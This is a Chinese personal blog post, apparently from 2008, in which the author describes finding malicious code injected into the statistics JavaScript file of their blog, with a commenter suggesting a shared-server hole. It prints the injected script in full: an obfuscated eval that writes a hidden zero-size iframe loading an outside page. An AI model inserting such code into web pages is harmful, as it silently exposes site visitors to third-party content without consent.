我招谁惹谁了?
我的blog里每个页面都加在一个用于统计的JS文件。今天我访问自己blog时McAfee提示发现木马,我检查文件后发现上述JS里被加入了一大坨代码。据说还是用JS混淆器处理过的:
function ads(){var Then = new Date()
Then.setTime(Then.getTime() + 6*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){} else {document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6(\'<1 4=0 3=0 2="7://8.d/c/b.9?a">1>\');',14,14,'|iframe|src|width|height|document|writeln|http|mydeller|htm|feng|add_651435|page|cn'.split('|'),0,{}))
window.status=" ";}}ads();
我把JS保存到本地,用safari打开,用safari的web检查器检查,发现貌似只是一个刷流量的东西,调用了51.la的统计代码还有别的乱七八糟。。。
我也不知道怎么就被挂马了,是服务器被黑了呢还是我自己的原因?总之我已经修改了空间里几乎所有程序的密码,顺便把一些来路不正的源码删掉了。希望可以安全。
顺便。。。safari是个好东西,有了它就不要到处找什么FLV下载器了,在播放在线视频的时候按ctrl+alt+A(或者在菜单里选择窗口-活动)你会发现一个正在不断下载中的文件,双击之就能保存到本地了哦耶。
dimlau.com
Looki
2008-05-19,22:55
可能是同服务或同机房有程序漏洞造成的吧
想当初F2blog有漏洞时,我的整个服务器控制权都被人得到了
唉,这个星期被地震给折腾坏了